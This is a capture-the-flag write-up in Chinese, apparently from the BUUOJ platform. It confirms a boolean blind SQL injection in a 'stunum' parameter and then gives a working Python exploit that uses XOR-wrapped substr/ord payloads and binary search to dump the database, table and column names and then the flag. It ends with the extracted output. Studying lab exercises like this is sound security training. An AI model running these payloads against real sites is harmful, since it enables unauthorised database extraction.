?stunum=1/**/and/**/1=1
输出
?stunum=1/**/and/**/1=2
输出
判断存在布尔注入
利用异或注入
异或的运算法则如下
1 ^ 0 == 1
1 ^ 1 == 0
0 ^ 0 == 0
即相同为0,不同为1。
exp:
import time
import requests
import string
url = "http://bde6030d-4845-46fd-aa0b-427118e9109d.node4.buuoj.cn:81/?stunum="
flag = ''
def payload(i, j):
# 数据库名字
# sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)
# 表名
# sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='ctf'),%d,1))>%d)^1"%(i,j)
# 列名
# sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),%d,1))>%d)^1"%(i,j)
# 查询flag
sql = "1^(ord(substr((select(group_concat(value))from(flag)),%d,1))>%d)^1" % (i, j)
# data = {"stunum": sql}
r = requests.get(url+sql, timeout=5)
time.sleep(0.04)
# print (r.url)
if "Hi admin" in r.text:
res = 1
else:
res = 0
return res
def exp():
global flag
for i in range(1, 10000):
print(i, ':')
low = 31
high = 127
while low <= high:
mid = (low + high) // 2
res = payload(i, mid)
if res:
low = mid + 1
else:
high = mid - 1
f = int((low + high + 1)) // 2
if (f == 127 or f == 31):
break
# print (f)
flag += chr(f)
print(flag)
if __name__ == "__main__":
exp()
print('输出:', flag)
1、数据库
输出: information_schema,ctf
2、表名
输出: flag,score
3、列名
输出: flag,value
4、取列值
输出: flag{e58481f5-0a73-4f49-a6c5-e92e6806eca2}